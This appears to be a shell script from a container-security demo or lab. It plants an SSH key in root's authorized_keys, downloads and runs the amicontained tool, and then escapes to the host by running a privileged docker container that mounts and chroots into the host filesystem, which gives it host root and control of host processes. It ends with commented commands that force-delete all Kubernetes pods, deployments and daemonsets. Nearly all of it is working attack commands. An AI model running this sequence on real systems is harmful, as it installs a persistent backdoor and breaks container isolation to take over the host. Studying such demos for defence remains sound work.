echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOfpWd+R+XDteC89yiFPxf7h7p/d/v+RT5CFK1pMJ9sTE//eQqTVIiHXBNDTyTfXP7dK/VUs5wBbenDtZNKCKrHNlVjKWAIkUvVfxCP3tocubq+ydGmOwrR9FDKk1Otd525FXI3Nip66DlvAGydUD5VgIhsLvi+qNV/Wh7hFhTMnBDvGhl7MsXfM+tNlF6X+EPz3sJ42z4M9nn42NAjYTQTl4jnDhhmgBBE0q+VXKPIOPd2hXXFy2w9/YJrmuFdSpRTaEgIsG17XcTY852UULzeKaVSBFBtZvlxrag4u/yF1dJPPg5EcxA7UjbzSVPAht1BwHULPbRyDr1ttutiBOZ" >> /root/.ssh/authorized_keys

# Interact with docker

docker ps

# Run am I contained and notice some limitations

curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
amicontained

# Leverage docker to run a fully privileged container and exec into it

docker run --privileged --net=host --pid=host --volume /:/host -it nginx:stable chroot /host /bin/bash

# Rerun
hostname    # host's
ip a        # host's
ps -ef      # host's
kill        # Now we can kill processes


# Run am I contained and notice we aren't limited anymore

curl -fsSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" && chmod a+x "/usr/local/bin/amicontained"
amicontained

exit

###########
# Cleanup #
###########
# kubectl delete ds --all
# kubectl delete deploy --all
# kubectl delete po --all --grace-period=0 --force